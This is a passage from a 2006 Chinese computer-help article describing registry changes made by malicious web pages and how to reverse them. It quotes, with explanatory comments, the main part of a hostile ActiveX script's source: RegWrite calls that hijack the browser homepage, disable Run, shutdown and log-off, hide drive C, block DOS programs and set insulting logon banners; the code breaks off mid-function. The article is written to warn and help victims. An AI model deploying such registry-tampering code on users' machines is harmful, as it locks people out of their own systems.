当前位置: 电脑软硬件应用网 > 电脑学院 > 网络安全 > 正文 |
|
|||
浏览网页注册表被修改之迷及解决办法 | |||
2006-8-30 8:02:15 文/佚名 出处:电脑软硬件应用网 | |||
HKEY_LOCAL_MACHINESoftwareMicrosoftInternet ExplorerSearchCustomizeSearch HKEY_LOCAL_MACHINESoftwareMicrosoftInternet ExplorerSearchSearchAssistant 解决办法: 运行注册表编辑器,依次展开上述子键,将“CustomizeSearch”和“SearchAssis tant”的键值改为某个搜索引擎的网址即可。 8、系统启动时弹出对话框 受到更改的注册表项目为: HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionWinlogon在其下被建立了字符串“LegalNoticeCaption”和“LegalNoticeText”,其中“LegalNoticeCaption”是提示框的标题, “LegalNoticeText”是提示框的文本内容。由于它们的存在,就使得我们每次登陆到Windwos桌面前都出现一个提示窗口,显示那些网页的广告信息!你瞧,多讨厌啊! 解决办法: 打开注册表编辑器,找到 HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionWinlogo这一个主键,然后在右边窗口中找到“LegalNoticeCaption”和“LegalNoticeText”这两个字符串,删除这两个字符串就可以解决在登陆时出现提示框的现象了。 9、浏览网页注册表被禁用 这是由于注册表 HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesSystem下的 DWORD值“DisableRegistryTools”被修改为“1”的缘故,将其键值恢复为“0”即可恢复注册表的使用。 解决办法 用记事本程序建立以REG为后缀名的文件,将下面这些内容复制在其中就可以了: REGEDIT4[HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesSystem]“DisableRegistryTools”=dword:00000000。 10、浏览网页开始菜单被修改 这是最“狠”的一种,让浏览者有生不如死的感觉。浏览后不仅有类似上面所说的那些症状,还会有以下更悲惨的遭遇: 进入该网页会被: 1.修改开始菜单 1)禁止“关闭系统” 2)禁止“运行” 3)禁止“注销” 2.隐藏C盘——你的C盘找不到了 3.禁止使用注册表编辑器regedit 4.禁止使用DOS程序 5.使系统无法进入“实模式” 6.禁止运行任何程序 7.将IE浏览器的首页改为http://www.findfeel.com/,收藏夹中也被加入该网址。 那么这些功能恐怖的功能是如何实现的呢?原来,该网页是有人利用Java技术制作的含有有害代码的ActiveX网页文件。为让更多的人了解其危害,我查看了其源代码,将其主要部分列了出来,并加了详细的注释(文中有“注”字的部分是我加的注释)。 注:下面代码是将你的IE默认连接首页改为http://www.findfeel.com/ Shl.RegWrite ("HKCUSoftwareMicrosoftInternet ExplorerMainStart Page", "http://www.findfeel.com/"); 注:以下是该网页修改受害者的注册表项所用的招数 Shl.RegWrite ("HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerNoRun", 01, "REG_BINARY"); 注:使受害者系统没有“运行”项,这样用户就不能通过注册表编辑器来修改该有害网页对系统注册表的修改。 Shl.RegWrite ("HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerNoClose", 01, "REG_BINARY"); 注:使受害者系统没有“关闭系统”项 Shl.RegWrite ("HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerNoLogOff", 01, "REG_BINARY"); 注:使受害者系统没有“注销”项 Shl.RegWrite ("HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerNoDrives", "00000004", "REG_DWORD"); 注:使受害者系统没有逻辑驱动器C Shl.RegWrite ("HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesWinOldApp Disabled","REG_BINARY"); 注:禁止运行所有的DOS应用程序; Shl.RegWrite ("HKCUSoftwareMicrosoftWindowsCurrentVersionPolicies WinOldAppNoRealMode","REG_BINARY"); 注:使系统不能启动到“实模式”(传统的DOS模式)下; 又注:进入该网页,它还会修改以下的注册表项,使WINDOWS系统登录时显示一个登录窗口(在MicroSoft网络用户登录之前) Shl.RegWrite ("HKLMSoftwareMicrosoftWindowsCurrentVersionWinlogonLegalNoticeCaption", "呜啦啦..."); 注:这些代码会使窗口的标题是“呜啦啦…” Shl.RegWrite ("HKLMSoftwareMicrosoftWindowsCurrentVersionWinlogonLegalNoticeText", "欢迎你!你这个超级无敌大白痴!《呜啦啦...》故事开始了,按确定进入悲惨世界"); 注:上面一行是会在窗口中显示出来的文字 注:下面两行代码修改注册表,使受害者所有的IE窗口都加上以下的标题:“呜啦啦…” Shl.RegWrite ("HKLMSoftwareMicrosoftInternet ExplorerMainWindow Title", "呜啦啦..."); Shl.RegWrite ("HKCUSoftwareMicrosoftInternet ExplorerMainWindow Title", "呜啦啦..."); 注:到上面一行为止,完成了对受害者的注册表的所有修改! 注:下面代码用来将其网页增加到受害者的收藏夹中 var WF, Shor, loc; WF = FSO.GetSpecialFolder(0); loc = WF + "Favorites"; if(!FSO.FolderExists(loc)) { loc = FSO.GetDriveName(WF) + "Documents and Settings" + Net.UserName + "Favorites"; if(!FSO.FolderExists(loc)) { return; } |
|||
关于45IT | About 45IT | 联系方式 | 版权声明 | 网站导航 | |
Copyright © 2003-2011 45IT. All Rights Reserved 浙ICP备09049068号 |